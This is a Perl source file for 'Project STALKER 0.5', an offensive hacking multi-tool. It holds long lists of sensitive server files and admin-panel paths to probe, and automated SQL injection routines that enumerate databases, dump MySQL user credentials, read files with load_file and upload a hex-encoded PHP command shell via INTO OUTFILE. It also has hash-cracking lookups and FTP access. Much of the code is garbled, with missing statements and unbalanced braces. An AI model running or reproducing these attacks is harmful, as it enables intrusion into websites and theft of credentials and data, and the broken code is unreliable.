#!usr/bin/perl #Project STALKER 0.5 #Coded By Doddy H # #ppm install http://www.bribes.org/perl/ppm/DBI.ppd #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd # use IO::Socket; use HTML::LinkExtor; use LWP::UserAgent; use Win32::Process; use Net::FTP; use Cwd; use MIME::Base64; use DBI; use Color::Output; Color::Output::Init my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/h
ttpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Mac
intosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\
ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'); @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' 
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' 
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); unless (-d 
"/logs/webs") { } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); getinfo(); $SIG{INT} = \&next; while(1) { cprint "\x037"; #13 menujo(); cprint "\x030"; } sub getinfo { $so = $^O; $login = Win32::LoginName(); $domain = Win32::DomainName(); cprint "\x0313"; #13 cprint "\x030"; } sub menujo { if ($cmd=~/getinfo/ig) { getinfo(); } if ($cmd =~/getip (.*)/) { my $te = $1; if ($te eq "" or $te eq " ") { } } elsif ($cmd =~/getlink (.*)/) { $code = toma($1); my @re = get_links($code); for my $url(@re) { } } elsif ($cmd=~/help/) { helpme(); } elsif ($cmd=~/getprocess/) { my %re = getprocess(); ($proceso,$pid) = ($t=~/(.*):(.*)/ig); } } elsif ($cmd=~/killprocess (.*) (.*)/) { if (killprocess($1,$2)) { } } elsif ($cmd=~/conec (.*) (.*) (.*)/) { } elsif ($cmd=~/allow (.*)/) { $re = conectar($1,"80","GET / HTTP/1.0\r\n"); if ($re=~/Allow:(.*)/ig) { }} elsif ($cmd=~/paths (.*)/) { scanpaths($1); } elsif ($cmd=~/encodehex (.*)/) { } elsif ($cmd=~/decodehex (.*)/) { } elsif ($cmd=~/download (.*) (.*)/) { my $file,$name = $1,$2; if (download($1,$2)) { } } elsif ($cmd=~/encodeascii (.*)/) { } elsif ($cmd=~/decodeascii (.*)/) { } elsif ($cmd=~/encodebase (.*)/) { } elsif ($cmd=~/decodebase (.*)/) { } elsif ($cmd=~/aboutme/) { aboutme(); } elsif ($cmd=~/scanport (.*)/) { scanport($1); } elsif ($cmd=~/panel (.*)/) { scanpanel($1); } elsif ($cmd=~/scangoogle/) { my @links = google($dork,$pages); for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} } elsif ($cmd=~/getpass (.*)/) { crackit($1); } elsif ($cmd=~/ftp (.*) (.*) (.*)/) { ftp($1,$2,$3); } elsif ($cmd=~/navegator/) { nave: if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { } else { }}} if ($rta=~/cd (.*)/) { my $dir = $1; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { } else { } } else { } else { }}} } else { }} my $file = 
$1; #system(getcwd()."/".$file); } if ($rta=~/help/) { } next; } goto nave; } elsif ($cmd=~/kobra (.*)/) { my $url = $1; scansqli($url,"--"); } elsif ($cmd=~/mysql (.*) (.*) (.*)/) { enter($1,$2,$3); } copyright(); <stdin>; } else { } #print "\n\n"; } sub scansqli { my $page = $_[0]; ($pass1,$bypass2) = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } else { my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { motor($page,$_[1]); } else { if ($op eq "y") { motor($page,$_[1]); } else { #head(); #menu(); }}}} sub motor { my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { &menu_options($gen,$pass,$save); } else { } } my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); } } } sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if 
($page=~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); } else { savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { savefile($save.".txt","[information_schema.tables] : ON"); } else { savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] 
user_name : $3\n"); } else { } } } sub menu_options { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($rta=~/help/) { commands : details tables columns dbs othertable othercolumn mysqluser dumper createshell readfile logs exit ); } if ($rta =~/tables/) { schematables($_[0],$_[1],$save); &reload; } elsif ($rta =~/columns (.*)/) { my $tabla = $1; schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($rta =~/dbs/) { &schemadb($_[0],$_[1],$save); &reload; } elsif ($rta =~/othertable (.*)/) { my $data = $1; &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($rta =~/othercolumn (.*) (.*)/){ my ($db,$table) = ($1,$2); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($rta =~/mysqluser/) { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($rta=~/logs/) { $t = "logs/webs/$save.txt"; &reload; } next; } elsif($rta=~/createshell/) { &into($_[0],$_[1],$path,$save); } elsif($rta=~/readfile/) { loadfile($_[0],$_[1],$save); } elsif ($rta=~/dumper (.*) (.*) (.*)/) { my ($tabla,$col1,$col2) = ($1,$2,$3); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($rta =~/details/) { &details($_[0],$_[1],$save); &reload; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { } } sub reload { 
&menu_options($_[0]); } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; savefile($save.".txt","[+] Databases Length : $limita\n"); $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print 
$page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); $real++; }} } else { }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if 
($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { } } savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); } else { last; &reload; } } } else { }}} sub loadfile { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }} &reload; } sub into { my ($page,$bypass,$dir,$save) = @_; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if 
($path=~/\/(.*)$/) { my $path1 = $1; my $path2 = $path1; $shell = $dir."/"."shell.php"; if ($page =~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2); $code1 = toma("http://".$auth."/".$path2."/"."shell.php"); if ($code1=~/Mini Shell By Doddy/ig) { savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php"); } else { } } } &reload; } sub bypass { sub ascii { } sub base { $re = encode_base64($_[0]); } sub base_de { $re = decode_base64($_[0]); } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { return true; }}} sub hex_en { my $string = $_[0]; $hex = '0x'; } } sub hex_de { $text =~ s/^0x//; } sub ascii_de { } sub getprocess { my %procesos; my $uno = Win32::OLE->new("WbemScripting.SWbemLocator"); my $dos = $uno->ConnectServer("","root\\cimv2"); foreach my $pro (in $dos->InstancesOf("Win32_Process")){ $procesos{$pro->{Caption}} = $pro->{ProcessId}; } } sub killprocess { my ($numb,$pid) = @_; if (Win32::Process::KillProcess($pid,$numb)) { return true; } else { return false; } } sub getip { } sub crackit { my $secret = $_[0]; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => 
"Search MD5"}', }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; saveyes("logs/pass-found.txt",$secret.":".$1); } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { saveyes("logs/pass-found.txt",$secret.":".$1); } } } print "\n[+] Finish\n"; } sub ftp { my ($ftp,$user,$pass) = @_; if (my $socket = Net::FTP->new($ftp)) { if ($socket->login($user,$pass)) { print "\n[+] Enter of the server FTP\n\n"; menu: print "\n\nftp>"; chomp (my $cmd = <stdin>); print "\n\n"; if ($cmd=~/help/) { print q( help : show information cd : change directory <dir> dir : list a directory mdkdir : create a directory <dir> 